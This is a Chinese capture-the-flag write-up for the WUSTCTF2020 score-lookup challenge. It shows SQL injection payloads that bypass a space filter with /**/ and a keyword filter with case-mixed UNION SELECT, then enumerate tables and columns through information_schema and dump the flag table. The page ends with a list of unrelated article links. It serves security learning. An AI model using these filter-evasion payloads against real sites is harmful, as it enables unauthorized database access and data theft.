当前位置: 首页 > news >正文

[WUSTCTF2020]颜值成绩查询1

考点:

sql

bool盲注

bypass

先打开页面看到有个输入框,输入个1发现回显

如果是1'的话就不行了,通过测试发现是过滤了空格,需要还是需要使用注释符/**/来绕过,爆列数

payload:1/**/order/**/by/**/3--+

发现只有三列,在输入payload:1/**/union/**/select/**/1,2,3--+时发现union和select被过滤了,可以使用大小写来混淆绕过,所以payload应该是 -1/**/uNion/**/sElect/**/1,2,3--+

接着来爆表名

payload:-1/**/uNion/**/sElect/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()--+

然后来爆列名

payload:-1/**/uNion/**/sElect/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'--+

获取flag值payload:-1/**/uNion/**/sElect/**/1,2,group_concat(flag,value)/**/from/**/flag--+

还有其他方法,布尔盲注upfine的博客 (cnblogs.com)

参考文章

[WUSTCTF2020]颜值成绩查询 - 跳河离去的鱼 - 博客园 (cnblogs.com)

upfine的博客 (cnblogs.com)

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • h5页面使用antd-modal,怎么处理居中且自然
  • GO 匿名函数
  • TCP socket
  • G1: Yunli‘s Subarray Queries (easy version)(1900)(定长区间众数)
  • SpringCloud的学习,Consul服务注册与发现、分布式配置,以及 服务调用和负载均衡
  • 【自动化测试】UI自动化的分类、如何选择合适的自动化测试工具以及其中appium的设计理念、引擎和引擎如何工作
  • Ubuntu 22.04 LTS 上安装 Docker
  • 使用jmeter做性能测试实践过程中需要注意什么
  • FreeRTOS学习笔记(七)信号量
  • 《C++代码高度优化之双刃剑:避免过度优化引发的“暗雷”》
  • MySQL中的redo log、 undo log、bin log
  • flink中startNewChain() 的详解
  • 【计网】从零开始使用UDP进行socket编程 --- 服务端业务实现
  • 相亲交友中的用户画像构建方法探讨
  • cfs三层靶机——内网渗透
  • Android Studio:GIT提交项目到远程仓库
  • Android 架构优化~MVP 架构改造
  • electron原来这么简单----打包你的react、VUE桌面应用程序
  • js学习笔记
  • React-flux杂记
  • vue 配置sass、scss全局变量
  • 从重复到重用
  • 关于使用markdown的方法(引自CSDN教程)
  • 计算机在识别图像时“看到”了什么?
  • 前端 CSS : 5# 纯 CSS 实现24小时超市
  • 前端工程化(Gulp、Webpack)-webpack
  • 强力优化Rancher k8s中国区的使用体验
  • 什么软件可以提取视频中的音频制作成手机铃声
  • 世界上最简单的无等待算法(getAndIncrement)
  • Java数据解析之JSON
  • ###51单片机学习(2)-----如何通过C语言运用延时函数设计LED流水灯
  • (分布式缓存)Redis持久化
  • (三)终结任务
  • (转)c++ std::pair 与 std::make
  • (转)JAVA中的堆栈
  • (转)程序员技术练级攻略
  • (转)母版页和相对路径
  • .NET COER+CONSUL微服务项目在CENTOS环境下的部署实践
  • .Net CoreRabbitMQ消息存储可靠机制
  • .NET Standard 支持的 .NET Framework 和 .NET Core
  • .net 获取url的方法
  • .net 重复调用webservice_Java RMI 远程调用详解,优劣势说明
  • .NET/C# 编译期能确定的字符串会在字符串暂存池中不会被 GC 垃圾回收掉
  • .NET开源的一个小而快并且功能强大的 Windows 动态桌面软件 - DreamScene2
  • [2021]Zookeeper getAcl命令未授权访问漏洞概述与解决
  • [AIR] NativeExtension在IOS下的开发实例 --- IOS项目的创建 (一)
  • [BT]BUUCTF刷题第4天(3.22)
  • [C#]C# winform部署yolov8目标检测的openvino模型
  • [docker]docker网络-直接路由模式
  • [flask]http请求//获取请求体数据
  • [Grafana]ES数据源Alert告警发送
  • [hive] posexplode函数
  • [IOI2007 D1T1]Miners 矿工配餐
  • [java]删除数组中的某一个元素
  • [LeetCode] 2.两数相加